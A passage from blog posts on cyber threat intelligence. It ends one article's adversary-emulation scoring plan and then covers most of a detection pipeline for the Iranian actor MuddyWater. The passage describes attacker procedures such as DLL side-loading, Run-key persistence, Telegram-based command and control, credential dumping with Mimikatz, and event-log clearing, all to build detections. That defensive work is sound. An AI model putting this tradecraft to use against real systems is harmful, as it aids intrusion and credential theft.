SIEM? || MOD-03 | T1078.001 | Replay captured session token | curl | Anomalous auth rule | DET-003 deployed? || MOD-04 | T1021.001 | RDP from jump host to target | mstsc | Lateral movement rule | Jump host Sysmon running? || MOD-05 | T1059.001 | Execute PowerShell from RDP session | powershell.exe | T1059 rule | DET-005 deployed? || MOD-06 | T1048.003 | Exfil dummy file via HTTPS | curl | Egress detection | DB audit rule deployed? || MOD-07 | T1070.001 | Clear Windows event logs | wevtutil | Log-clearing alert | DET-007 deployed? |Execute and score:# Post-execution: scan lab evtx with all Sigma ruleshayabusa csv-timeline \ --directory ./lab-evtx/ \ --output emulation-results-$(date +%Y%m%d).csv \ --profile verbose# Check which modules firedgrep -E "T1557|T1078|T1059|T1048|T1021|T1070|T1566" emulation-results-*.csvCoverage matrix with root cause for every FAIL:| Module | Technique | Result | Root Cause | Remediation ||---|---|---|---|---|| MOD-01 | T1566.001 | PARTIAL | Rule fired; attachment hash missing — email gateway log field not parsed | Fix Logstash parser for email gateway || MOD-02 | T1557 | FAIL | Rule not deployed — VPN log pipeline not complete at exercise date | ENG-001 still open; reschedule after pipeline completes || MOD-03 | T1078.001 | PASS | Alert within 90 seconds | — || MOD-04 | T1021.001 | PASS | Alert within 2 min | — || MOD-05 | T1059.001 | PASS | Alert within 45 seconds | — || MOD-06 | T1048.003 | FAIL | Data source missing — DB audit log pipeline not complete | ENG-002 still open || MOD-07 | T1070.001 | PASS | Alert within 20 seconds | — |## Summary: 4 PASS (57%) | 1 PARTIAL (14%) | 2 FAIL (29%)## Both FAILs trace to open engineering tickets, not missing detection rules.Git Discipline — The Same for All ModesThe git log is the audit trail. Commit phase by phase with informative messages:# After intakegit add 00-scope/intake.mdgit commit -m "PROJ-001: intake — initial hypothesis AiTM contractor theft; 3 PIRs identified"# After scope sign-offgit add 00-scope/scope.mdgit commit -m "PROJ-001: scope - signed off by CISO 2025-03-18; TLP AMBER; legal hold"# After evidence inventorygit add 01-evidence/git commit -m "PROJ-001: evidence - 5 sources, GAP-001 (4h Sysmon 03-17), checksums committed"# After timeline and claimsgit add 03-analysis/git commit -m "PROJ-001: analysis - 16 events, 5 claims; PIR-001 answered YES (CL-002)"# After ATT&CK mappinggit add 03-analysis/attck-mapping/git commit -m "PROJ-001: ATT&CK mapping - 6 techniques, 2 rule-missing, 2 data-missing, 1 incomplete"# After detections validatedgit add 04-detections/git commit -m "PROJ-001: detections - DET-001 to DET-004 validated PASS via Hayabusa"# After deliverables completegit add 05-deliverables/git commit -m "PROJ-001: deliverables - executive brief and SOC handoff; INCD notification ready"Rules:One commit per completed phase — not one bulk commit at the endNever edit a committed evidence file — create a new amendment document and commit thatCommit messages: project ID + phase + factual one-line summary of what changedWhen an assessment changes (e.g., CL-003 confidence downgraded), commit the change with a message explaining whyMinimum-Viable Path: No Lab RequiredThe full methodology runs without Docker. Replace each lab component:The intake template, evidence labels, claims ledger, ATT&CK gap taxonomy, and git commit discipline apply identically with or without the lab stack.The EcosystemCTI as a Code is one part of a practitioner ecosystem:CTI as a Code — Lab stack, investigation scaffolds, and training assignments. Use when running an investigation or building detection coverage.CTI Analyst Field Manual — Analytic tradecraft standard. Use when you need the full methodology behind evidence labels, PIR design, attribution, and CTI-to-detection.Israel Government Threat Actors CTI — Israeli sector threat knowledge base. Use when working on any Israeli government, CII, or public sector engagement.Customer-Driven AI CTI — CTI delivery methodology. Use when turning CTI work into a managed customer engagement with quality gates.Ecosystem page — End-to-end cross-project workflows.See the Ecosystem page for end-to-end cross-project workflows.Where to Start# Get the projectgit clone https://github.com/anpa1200/CTI_as_a_Code.gitcd CTI_as_a_Code# Reactive: copy the template, run intake, start scopingcp -r templates/reactive/ ../my-first-investigation/cd ../my-first-investigation/git init && git add . && git commit -m "PROJ-001: scaffold initialized"cp 00-scope/scope.md 00-scope/intake.md # use the intake template from this article# fill in intake.md during the first call, then scope.md after# Or open a fully worked example to see the complete methodology appliedls CTI_as_a_Code/training/A01-reactive-lifetech/The 8 training assignments in the repository are fully populated: project brief, synthetic evidence data, all analytical files, and worked solutions. A01 (reactive, 52-hour Iranian-nexus breach) is the best starting point for reactive work. A02 (proactive, nation-state telecom targeting) for proactive. A04 and A08 for adversary emulation.The methodology in this article is exactly what runs through all 8 assignments.Tags: Threat Intelligence · CTI · Detection Engineering · Incident Response · Sigma · MITRE ATT&CK · Blue Team · CybersecurityFollow My WorkI publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.Portfolio / Knowledge Base: https://anpa1200.github.io/Medium: https://medium.com/@1200kmGitHub: https://github.com/anpa1200LinkedIn: https://www.linkedin.com/in/andrey-pautov/Andrey PautovCTI as a Code: Complete Step-by-Step Methodology was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana

Mon, 08 Jun 2026 06:31:01 +0200

11 validated detections from public sources, OpenCTI graph, and a one-command labTable of ContentsMost threat actor writeups stop too early. They describe the group, list ATT&CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: what do I actually do with this on Monday?Operation Desert Hydra is an answer to that question.This article documents a full CTI-to-detection pipeline focused on MuddyWater — an Iranian state-linked actor (MOIS) that has been targeting Israeli government, defense, and critical infrastructure organizations since at least 2019. By the end, you’ll have 11 detection records, 12 Kibana proof screenshots, and a working lab you can deploy with a single command.Everything is on my GitHub: github.com/anpa1200/operation-desert-hydraGitHub - anpa1200/operation-desert-hydra: OpenCTI-based CTI-to-Detection Knowledge Graph for Iranian activity against Israeli organizationsWhy MuddyWater?The PipelinePhase 1: Source GatheringPhase 2: Procedure DatasetPhase 3: OpenCTI Knowledge GraphPhase 4: Detection AtlasPhase 5: Validation LabValidation Results SummaryPhase 6: Coverage MatrixWhat Defenders Should Do Right NowReproduce It YourselfProduction ScarsWhy MuddyWater?Three reasons:Rich public reporting. CISA, Israel’s INCD, ClearSky, Deep Instinct, Mandiant, and Proofpoint have all published detailed technical analysis. This gives enough procedure-level specificity to engineer real detections.Consistent playbook. Across five years of reporting, the same pattern recurs: spearphishing → scripting engine → encoded PowerShell → RMM tool. The consistency makes it detectable.Relevant geography. The actor consistently targets Israeli organizations — a geography with high analytical value and underserved public detection coverage.The PipelineThe project enforces a chain from source to Kibana screenshot:source → claim → procedure → ATT&CK mapping → telemetry requirement → detection pseudologic → benign simulation → lab result → coverage scoreNo step is skipped. Every claim has a source. Every detection has a validation case. Every PASS has a screenshot.Phase 1: Source GatheringThe first step is source discovery, not detection writing.Traditional Source Gathering — and Why It’s Not Enough AloneThe standard workflow for CTI source gathering looks like this: run keyword searches (Google, Google Dorks, site: operators for known vendor blogs), check your Threat Intelligence Platform for existing reports on the actor, subscribe to vendor RSS feeds, pull ISAC/ISAO advisories, and query your organization’s TIP for any existing indicator sets or finished intelligence reports tagged to the actor.For a mature, well-documented actor like MuddyWater this gets you to maybe 15–20 well-known sources quickly — the CISA advisory, the MITRE ATT&CK page, two or three vendor blog posts you already knew about. The problem is coverage holes: you’ll reliably find sources that are already in your network’s vocabulary and miss the ones that aren’t. A CERT-IL PDF published in Hebrew and linked only from a government portal, a Group-IB campaign teardown behind a partial paywall, or a 2020 ClearSky report that predates your current TIP subscription window — all of these can fall out of a manual search pass.TIPs compound this in a specific way: they surface what has already been ingested and tagged. If a source was never promoted into your TIP (because it was published before the subscription started, or because no analyst had time to import it), it is invisible inside the platform. The TIP is authoritative for what it knows, not for the universe of available sources.AI researchThe parallel AI research pass was not a replacement for traditional gathering — it was a coverage supplement. After both approaches ran, the traditional pass and the AI outputs were merged into the same deduplication step. The AI outputs added approximately 40 sources beyond what a manual search surfaced; traditional search added discipline about sources the models hallucinated (fabricated URLs, mis-attributed PDFs). Neither was sufficient alone.I ran parallel deep-research passes using Gemini and OpenAI, both given the same prompt. Each returned a candidate source register. Both outputs were compared, deduplicated (71 candidates → 8 promoted), and the surviving sources were manually acquired and reviewed before anything entered the dataset.The Actual PromptThis is the exact prompt used — both models received it verbatim:You are a senior CTI researcher and source-validation analyst. For Operation Desert Hydra,gather the best public sources on MuddyWater / Seedworm / Mango Sandstorm / TA450 andrelated Iranian activity against Israeli organizations. Goal: create a source register foran OpenCTI-based CTI-to-detection knowledge graph:Source → Actor → Campaign → Procedure → ATT&CK Technique → Observable → Log Source→ Detection → Validation → Coverage.Search MITRE ATT&CK, CISA/FBI/NSA, Israel National Cyber Directorate, Microsoft,Google/Mandiant, ESET, Check Point, ClearSky, Unit 42, Proofpoint, SentinelOne,Recorded Future, Symantec, Talos, Trend Micro, Kaspersky, Cloudflare/Hunt.io/DomainTools,GitHub, and academic sources.Include secondary comparison actors only as comparison: APT34, APT35/Charming Kitten/MintSandstorm, CyberAv3ngers, Agrius. Do not merge actors unless a source explicitly supportsoverlap.For every source, return this YAML structure: id, title, publisher, url, direct_download_url, download_type, publication_date, access_date, actor_claims, source_type, reliability, relevance flags for actor_profile/procedures/malware/infrastructure/detections/validation_lab/opencti_modeling, key_entities, key_attck_techniques, source_summary, use_for_project, limitations.Provide direct PDF/STIX/JSON/CSV/GitHub raw links where available; if unavailable writedirect_download_url: none_found. Do not invent URLs or dates.Use evidence labels: Observed = directly shown in telemetry/sample/log/screenshot/source artifact Reported = stated by source Assessed = source judgment Inferred = analyst conclusion from multiple cited facts Gap = unknown or not provenDo not upgrade source claims, do not treat ATT&CK mapping as attribution evidence, do nottreat shared tooling as actor identity proof, and do not claim detection coverage withoutvalidation.Search exact terms including: MuddyWater Iran MOIS, MuddyWater Seedworm, MuddyWater Mango Sandstorm, MuddyWater TA450, MuddyWater POWERSTATS, PowGoop, MuddyViper, MuddyWater Israel, Israeli organizations, PowerShell, RMM, phishing, spearphishing, Exchange CVE-2020-0688, CVE-2017-0199, MITRE ATT&CK, CISA FBI NSA advisory, Mango Sandstorm Microsoft, TA450 Proofpoint, Seedworm Symantec, ESET, ClearSky, Unit 42, Check Point, Mandiant, SentinelOne, Recorded Future, Talos, Trend Micro, Kaspersky; also: APT34 Israel, APT35 Israel, Mint Sandstorm Israel, CyberAv3ngers Israel, Agrius Israel, Iranian threat actors Israeli organizations.Output only these sections: 1) Executive Source Assessment 2) High-Priority Source Register with 10-20 best sources in YAML 3) Extended Source Register 4) Direct Downloads Table 5) Actor Alias / Overlap Notes 6) Procedure Extraction Candidates grouped by tactic with source_ids, evidence_label, ATT&CK candidate, required telemetry, detection opportunity, validation_possible 7) OpenCTI Modeling Candidates 8) Detection Engineering Opportunities marked candidate only 9) Gaps And Manual Review ItemsThe final output must be usable to seed data/sources.yaml, data/procedures.yaml,docs methodology, OpenCTI import plan, and detection atlas.What the Prompt Is Designed to DoA few decisions worth explaining:Output schema in the prompt. Asking for a specific YAML field list (id, title, publisher, url, direct_download_url…) forces the model to either produce usable data or leave a visible blank — no vague summaries. direct_download_url: none_found is the required answer when a URL doesn't exist, which prevents the model from inventing one.Evidence labels baked in. The five labels (Observed / Reported / Assessed / Inferred / Gap) are defined in the prompt so the model applies them consistently and the output is ready to feed directly into data/procedures.yaml without reformatting.Explicit anti-hallucination rules. “Do not invent URLs or dates.” “Do not upgrade source claims.” “Do not treat ATT&CK mapping as attribution evidence.” These are not just principles — they are instructions the model can fail visibly on, which makes QA faster.Parallel models, same prompt. Running Gemini and OpenAI on the same prompt and comparing outputs catches source fabrications: if one model lists a URL the other doesn’t, that URL gets verified before it enters the register. Two models that agree independently on a source add confidence; one model alone that lists something unusual is a flag.The Review GateEvery source that came out of the AI output went through this checklist before being promoted into data/sources.yaml:Is the URL real and accessible?Is the publication date accurate?Does the content actually describe MuddyWater procedures (not just mention the name)?Is there at least one procedure-level claim (not just “actor uses PowerShell”)?Is the actor identification explicit or inferred from shared tooling only?71 candidates → 8 government/vendor sources promoted. The rest were duplicates, secondary summaries, or sources that named the actor without procedure-level specificity.Research Artifacts (All in the Repo)Every file from the source gathering workflow is version-controlled and publicly accessible:Gemini-research.md — Raw Gemini deep-research output: candidate source register in YAML, procedure extraction candidates, OpenCTI modeling candidates, detection opportunities, gaps.openAI-research.md — Raw OpenAI deep-research output: executive assessment, high-priority sources, extended source register, direct download list, actor alias notes.relevant-research-list.md — Deduplicated candidate list after comparing both model outputs: 71 sources, acquisition targets for Step 5.source-acquisition-report.md — Results of the automated fetch run: HTTP status, content type, file size, and extraction status for all 71 sources.source-reliability-evidence-assessment.md — Analyst review notes: reliability ratings, evidence quality, promotion decisions, and limitations per source.raw-sources/ — 71 numbered source folders, each containing metadata.json, headers.txt, the raw source file, extracted source.txt, and fallback reader output.Promoted sources (highest weight):CISA AA22–055A (Feb 2022) — Full procedure survey: PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin; WMI survey script; credential dumping tools.INCD 2023 — Israeli campaign specifics: ScreenConnect/SimpleHelp RMM abuse, Egnyte/OneDrive lures, Log4j + Exchange exploitation.INCD 2024 — BugSleep analysis: 43-minute scheduled task beacon, VPN exploitation, new RMM tools (Level, PDQConnect).Supporting vendor sources: ClearSky, Deep Instinct, Group-IB, Mandiant, Proofpoint, Sekoia.io, Symantec.Why These Three Have the Highest WeightThe reliability assessment used a two-axis rubric: Source Reliability (A–F) separating publication discipline from content, and Information Credibility (1–6) rating how well each claim is grounded.CISA AA22–055A — Reliability A, Credibility 2This is a joint advisory signed by five national authorities: CISA, FBI, CNMF, NCSC-UK, and NSA. That multi-agency co-signature is not ceremonial — each agency must independently agree to the technical content before it publishes. The advisory names specific malware families (PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin), includes an actual WMI PowerShell survey script attributed to MuddyWater, and lists credential-dumping tool names. Evidence label: Reported / Assessed. The PDF acquired locally at raw-sources/07-u-s-cyber-command-defense-media-aa22-055a-pdf-mirror/source.pdf is the authoritative copy distributed via Defense Media Activity. Credibility is 2, not 1, because the advisory states TTPs based on intelligence assessment rather than a single intercepted artifact — but the authority behind that assessment is as high as public-source CTI gets.INCD 2023 (MuddyWater / DarkBit PDF) — Reliability A, Credibility 2The Israel National Cyber Directorate is the government authority responsible for civilian cyber defense in Israel, the primary target country for this actor. This report covers a specific Israeli campaign including: tool names (ScreenConnect, SimpleHelp), file-sharing lure services (Egnyte, OneDrive), exploitation of Log4j and Exchange CVE-2020–0688, and deployment of ransomware (DarkBit) as a cover operation. Evidence label: Observed / Reported / Assessed. The "Observed" label means the INCD had direct visibility into the incident — not a secondary summary. This gives procedure-level specificity that generic vendor threat intel doesn't reach. Acquired at raw-sources/17-israel-national-cyber-directorate-muddywater-darkbit-pdf/source.pdf.INCD 2024 (BugSleep PDF) — Reliability A, Credibility 2Same publisher authority as INCD 2023, focused on MuddyWater’s 2024 evolution. Key content: BugSleep backdoor analysis, the specific 43-minute scheduled task beacon interval (which became proc_mw_0006 and det_mw_0006), VPN exploitation, and new RMM tools (Level, PDQConnect). The 43-minute interval is a concrete behavioral fingerprint — not a general TTP category — and it came from direct INCD analysis. Evidence label: Observed / Reported / Assessed. Acquired at raw-sources/18-israel-national-cyber-directorate-technological-advancement-and-evolution-of-muddywater-in/source.pdf.The three sources share a common characteristic: they are not secondary aggregators or vendor marketing. They are government authorities with direct incident visibility reporting on specific Israeli campaigns.Steps After Deduplication: What Actually Happened to All 71 SourcesAfter the AI outputs were merged and deduplicated, 71 candidate sources remained. Here is what happened to them across Steps 5–9:Step 5 — Automated Acquisitiontools/fetch_research_sources.py ran against all 71 URLs. For each source it created a numbered folder under docs/source-gathering/raw-sources/ with:raw-sources/ 01-mitre-att-ck-muddywater-g0069/ metadata.json # URL, fetch timestamp, HTTP status, content-type, size headers.txt # Raw HTTP response headers source.html / source.pdf / source.txt # Primary file source.txt # Text extract (for PDFs and HTML) fallback-reader.txt # Reader-mode fallback if primary was blocked or JS-renderedNot all fetches succeeded. Some sources returned 403 (vendor gating), some required JS rendering (only fallback text was captured), and two PDFs were corrupted. The acquisition report at docs/source-gathering/source-acquisition-report.md records the HTTP status, file size, and extraction status for all 71.Step 6 — Reliability and Credibility RatingEach acquired source was rated using the two-axis rubric. The full assessment table is in docs/source-gathering/source-reliability-evidence-assessment.md. Outcome breakdown:Reliability A (government / primary standard): 23 sourcesReliability B (usually reliable vendor / research publisher): 25 sourcesReliability C (secondary / news / marketing): 18 sourcesReliability F (failed acquisition or cannot judge): 5 sourcesStep 7 — Promotion DecisionOnly sources with a combination of Reliability A or B, Credibility 2 or better, a usable acquisition, and at least one procedure-level claim were promoted into data/sources.yaml. The rest were assigned one of: Use as corroboration, Use as comparison only, Defer, or Exclude.71 candidates → 8 primary sources promoted into the dataset. The 63 that were not promoted are retained in raw-sources/ for future work; they are not discarded.Step 8 — Claim ExtractionFor each promoted source, specific claims were extracted with source binding and evidence labels. A claim is not “MuddyWater uses PowerShell” — it is: “CISA AA22–055A (AA22–055A PDF, p.4) reports that MuddyWater actors deploy PowGoop, a DLL loader that decrypts and executes a PowerShell backdoor (Reported)." This source-bound format prevents claim drift downstream.Step 9 — Procedure Candidate ExtractionFrom the bound claims, 10 procedure candidates were grouped by tactic: Initial Access, Execution, Persistence, Defense Evasion, Discovery, C2, Credential Access. Each candidate recorded: required telemetry, detection opportunity, whether lab validation was feasible, and whether the procedure appeared in multiple independent sources (a promotion signal for higher confidence scores later).The Full 71-Source Candidate ListThis is the deduplicated list produced after comparing Gemini and OpenAI outputs. Every source here was an acquisition target for Step 5.Core MuddyWater / Seedworm / TA450 / Mango SandstormMITRE ATT&CK — MuddyWater G0069MITRE ATT&CK — POWERSTATS S0223MITRE ATT&CK — PowGoop S1046CISA alert — Iranian Government-Sponsored MuddyWater Actors Conducting Malicious Cyber OperationsCISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A advisory pageCISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A PDFU.S. Cyber Command / Defense media — AA22–055A PDF mirrorNCSC-UK — Joint advisory on MuddyWater actorU.S. Cyber Command / Iran Watch mirror — Iranian intel cyber suite of malware PDFDecipher — US Cyber Command Discloses MuddyWater Malware SamplesSentinelOne — Wading Through Muddy WatersPalo Alto Unit 42 — Muddying the Water: Targeted Attacks in the Middle EastCERTFA Radar — MuddyWater Threat Actor ClusterCERTFA Radar — MuddyWater / Earth Vetala IntrusionGroup-IB — MuddyWater APT Group ProfileIsrael-Focused MuddyWater SourcesIsrael National Cyber Directorate — MuddyWater pageIsrael National Cyber Directorate — MuddyWater / DarkBit PDFIsrael National Cyber Directorate — Technological Advancement and Evolution of MuddyWater in 2024 PDFIsrael National Cyber Directorate — Overview of Recent Phishing PDFClearSky — Operation Quicksand: MuddyWater’s Offensive Attack Against Israeli OrganizationsClearSky — Operation Quicksand PDFMicrosoft — MERCURY and DEV-1084: Destructive attack on hybrid environmentMicrosoft — Exposing POLONIUM activity and infrastructure targeting Israeli organizationsProofpoint — TA450 Uses Embedded Links in PDF Attachments in Latest CampaignHarfangLab — MuddyWater campaign abusing Atera AgentsDeep Instinct — DarkBeatC2: The Latest MuddyWater Attack FrameworkSC Media — Novel C2 tool leveraged in latest MuddyWater attacksCheck Point — MuddyWater Threat Group Deploys New BugSleep BackdoorESET / WeLiveSecurity — MuddyWater: Snakes by the riverbankESET press release — Iran’s MuddyWater targets critical infrastructure in Israel and EgyptSecurity Affairs — MuddyWater strikes Israel with advanced MuddyViper malwareThe Hacker News — Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing AttacksRecent / Evolving MuddyWater ActivityProofpoint — Around the World in 90 Days: State-Sponsored Actors Try ClickFixProofpoint — Crossed Wires: a case study of Iranian espionage and attributionGroup-IB — Operation Olalampo: Inside MuddyWater’s Latest CampaignThe Hacker News — MuddyWater Targets MENA Organizations with GhostFetch, CHAR, and HTTP_VIPRapid7 — Muddying the Tracks: The State-Sponsored Shadow Behind Chaos RansomwareThe Hacker News — MuddyWater Uses Microsoft Teams to Steal Credentials in False Flag Ransomware AttackRapid7 — Iran Conflict Cyber Threat IntelligenceExtraHop — The Digital Front of Iranian Cyber Offensive and Defensive ResponseAbnormal Security — Tracking Iran-Aligned Cyber Operations Following U.S.-Israel StrikesUnit 42 — Boggy Serpens Threat AssessmentHive Pro — MuddyWater: Iran’s Adaptive Cyber Espionage MachineHive Pro — MuddyWater / Operation Olalampo PDFKaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2024 PDFKaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2025 PDFTrend Micro — Annual APT Report 2025 PDFIntel 471 — HUNTER Iranian Threat Actor Coverage PDFIran Threat Context and Comparison ActorsCISA — Iran Threat Overview and AdvisoriesCISA — Iran state-sponsored cyber threat publicationsCISA — AA23–335A: IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple SectorsCISA — AA23–335A PDFMITRE ATT&CK — APT34MITRE ATT&CK — APT35 / Charming KittenMITRE ATT&CK — AgriusMicrosoft — Mint SandstormMicrosoft — Peach Sandstorm deploys new custom Tickler malwareMicrosoft Learn — How Microsoft names threat actorsSentinelOne — Iranian Cyber Activity OutlookTrellix — The Iranian Cyber Capability PDFOpenCTI / STIX / Knowledge Graph ReferencesOpenCTI documentation — Data modelOpenCTI documentation — GraphQL APIOpenCTI documentation — DeduplicationOASIS — STIX 2.1 HTML specificationOASIS — STIX 2.1 PDF specificationSTIX Project — RelationshipsSTIXnet — Extracting STIX Objects in CTI ReportsFrom Text to Actionable Intelligence: Automating STIX Entity and Relationship ExtractionContext-aware Entity-Relation Extraction for Threat Intelligence Knowledge GraphsValidate Before PromotingBrandefense — MuddyWater PDFKPMG — CTI Report MuddyWater PDFCritical discipline: AI output was used only for source discovery. Every claim, mapping, and detection record required analyst review before entering the dataset.Phase 2: Procedure DatasetA procedure record is not an ATT&CK technique. ATT&CK describes what a class of actors can do. A procedure record describes what this actor did, in this campaign, as documented by this source, with a specific evidence label attached.The distinction matters for detection. “Adversaries use scheduled tasks (T1053.005)” does not help you tune a detection rule. “BugSleep creates a scheduled task with a 43-minute repeat interval (INCD 2024, Observed)” does — because you now have a concrete interval to hunt for, a specific tool name, and a source you can cite in your detection rationale.Each of the 10 records in data/procedures.yaml captures four things:The specific behavior — not the technique categoryThe source references that support it, with evidence labelsCandidate ATT&CK technique mappings and the reasoning behind each candidateRequired telemetry, a detection idea, validation plan, and known limitationsConfidence LabelsEach record carries one of four evidence labels inherited from the source assessment:Observed — the behavior appears directly in source telemetry, a recovered sample, a screenshot, or a government incident report with direct visibility into the event. This is the strongest label and the only one that justifies a high-priority detection without further corroboration.Reported — a source states the behavior occurred, but the evidence is assertion-level rather than artifact-level. Still usable; requires corroboration before relying on it alone.Assessed — the source draws an analytical conclusion based on multiple indicators. Appropriate for ATT&CK candidate mappings; not sufficient alone for a new detection claim.Inferred — analyst conclusion derived from combining multiple reported facts across sources. Weakest label; flag for review before using in production.All 10 procedures in this dataset carry Observed or High confidence. That is not a coincidence — it reflects the promotion threshold. Procedures that came only from secondary or inferred sources were not promoted into data/procedures.yaml; they stayed in the claim extraction notes for future work.The 10 Proceduresproc_mw_0001 — Spearphishing Email Delivery Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&CK: T1566.001, T1566.002, T1534Three delivery variants documented across all three primary government sources: ZIP attachments containing macro-enabled Excel files or PDFs; email links to Egnyte or OneDrive delivering compressed RMM installers; and emails sent from compromised legitimate accounts to increase lure credibility. In 2024, a Microsoft-update-lure campaign sent to 10,000+ accounts embedded a PowerShell API key, granting the actor direct agent access immediately after the RMM tool installed. Three independent government sources corroborate this procedure — it is the highest-confidence initial access vector in the dataset.proc_mw_0002 — Public-Facing Exploitation Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&CK: T1190Secondary initial access vector to phishing. Documented CVEs: CVE-2020–1472 (Netlogon/Zerologon), CVE-2020–0688 (Exchange), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities confirmed by INCD 2024. Exploitation is typically followed by RMM tool deployment or custom backdoor staging. The VPN claim from INCD 2024 does not name a specific CVE — treat as Reported until a CVE is attributed.proc_mw_0003 — PowerShell Execution and Script Obfuscation Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&CK: T1059.001, T1027Cross-cutting technique present in every tool tier. PowGoop uses an obfuscated .dat + config.txt PowerShell chain for C2 beaconing. POWERSTATS is a persistent PowerShell backdoor. The 2024 lure embedded an API key executed via PowerShell to grant direct agent access. Obfuscation is applied consistently via Base64, XOR, and custom encoding. Detection anchor: Script Block Logging (EID 4104) is the primary telemetry dependency — without it, this procedure is nearly invisible to endpoint-only detection.proc_mw_0004 — DLL Side-Loading Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&CK: T1574.002PowGoop’s canonical execution method: a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load and execute the malicious DLL. INCD 2024 confirms continued use across the 2024 toolset. Detection requires Sysmon EID 7 (image load) with signing status — not available from Windows Event Log alone. This is the most telemetry-constrained procedure in the dataset; validation was PARTIAL because the lab's stub DLL did not produce sufficient EID 7 signal.proc_mw_0005 — Registry Run Key and Startup Folder Persistence Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&CK: T1547.001Small Sieve adds index.exe under the Run key named OutlookMicrosift — mimicking a Microsoft application name. Canopy installs its first WSF script in the startup folder. AA22-055A documents an additional key: SystemTextEncoding. INCD 2024 confirms continued use. The specific key names (OutlookMicrosift, SystemTextEncoding) are high-confidence IoCs when present; a detection based only on "new Run key written by a non-installer" will generate noise in most enterprise environments.proc_mw_0006 — Scheduled Task (43-Minute Beacon) Confidence: Observed · Source: INCD 2024 (single source) · ATT&CK: T1053.005BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing. The interval is documented as customizable, but 43 minutes is the specific value observed in the INCD 2024 analysis. This is a single-source procedure — INCD 2024 only — which is why it carries a coverage score of 4 (correlated analytic) rather than 5 in the detection atlas. Before treating this interval as a high-confidence fingerprint in production, corroborate with a vendor source.proc_mw_0007 — RMM Tool Abuse Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024, multiple vendor sources · ATT&CK: T1219The most consistently documented technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple vendor sources), SimpleHelp, Level, PDQConnect (2024). The 2024 lure embedded an API key so the actor had direct agent access the moment the victim installed the tool. Detection must rely on delivery context and parent process — not binary name alone, since these are legitimate commercial tools.proc_mw_0008 — C2 via Web Protocols and DNS Tunneling Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&CK: T1071.001, T1572, T1102Multiple C2 channels documented. Small Sieve beacons via Telegram Bot API over HTTPS. Canopy sends collected data via HTTP POST. Blackout uses GET /questions and POST /about-us. AnchorRAT communicates over HTTPS port 443 in JSON format. Mori uses DNS tunneling. In 2024, Rentry.co was used as a legitimate platform for C2 redirection. The Telegram API is the highest-confidence detection anchor: outbound HTTPS to api.telegram.org from a non-browser process is unusual in enterprise environments and directly attributed across multiple sources.proc_mw_0009 — WMI System Discovery Survey Confidence: Observed · Source: AA22–055A (script documented verbatim) · ATT&CK: T1047, T1082, T1016, T1033, T1518.001MuddyWater runs a PowerShell script that queries WMI to collect: IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username, and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2. The exact script is reproduced in the CISA advisory. The SecurityCenter2 query is the detection anchor: legitimate enterprise software rarely queries this WMI namespace outside AV management contexts, making it a low-noise signal.proc_mw_0010 — Credential Dumping from LSASS and Credential Stores Confidence: Observed · Source: AA22–055A · ATT&CK: T1003.001, T1003.004, T1003.005Post-access credential access using three tools: Mimikatz and procdump64.exe against LSASS memory (T1003.001); LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005). Used post-exploitation to enable lateral movement with harvested credentials. Detection via Sysmon EID 10 (process accessing lsass.exe) is tool-agnostic — it fires regardless of whether the actor uses Mimikatz, procdump, or a custom variant with a different binary name. This is the most reliable detection path for this procedure.Phase 3: OpenCTI Knowledge GraphThe procedure dataset and source register go into a self-hosted OpenCTI 6.2 instance. This creates the analytical record — queryable, relationship-aware, ATT&CK-linked.OpenCTI DeploymentThe stack used in this project is documented and publicly reproducible. The full deployment — Docker Compose, connectors, and an AI enrichment connector that calls Claude via the Anthropic API — lives in a dedicated project:GitHub: github.com/anpa1200/opencti-intelligent-shieldGitHub - anpa1200/opencti-intelligent-shield: OpenCTI AI-driven threat intelligence enrichment with Claude and Docusaurus documentationMedium guide:The Intelligent Shield. OpenCTIMain guide: anpa1200.github.io/opencti-intelligent-shieldOpenCTI AI Enrichment | The Intelligent ShieldThe Intelligent Shield project covers: OpenCTI core stack (Redis, Elasticsearch, MinIO, RabbitMQ, platform, workers), MITRE ATT&CK connector, and a custom internal enrichment connector that uses Claude to automatically summarize and enrich threat objects. Docker Compose files, a sanitized .env.example, and full setup instructions are all version-controlled.To spin up the stack standalone (outside Operation Desert Hydra):git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTIcd openCTIcp .env.example .env# fill in tokens and passwords./scripts/start-all.sh # OpenCTI at :8080./scripts/stop-all.sh # halt, preserves volumesIn the context of Operation Desert Hydra the stack is embedded in stack/ and started with bash start.sh — no separate clone needed. The Intelligent Shield project is the standalone reference deployment for anyone who wants OpenCTI without the lab.Step 10: Stack Startbash start.sh --skip-lab # starts OpenCTI + Elasticsearch + Kibana onlyAll 12 core containers start: Redis, Elasticsearch, MinIO, RabbitMQ, OpenCTI platform, 3 workers, and the MITRE ATT&CK connector.Result: OpenCTI reachable at http://localhost:8080. All containers 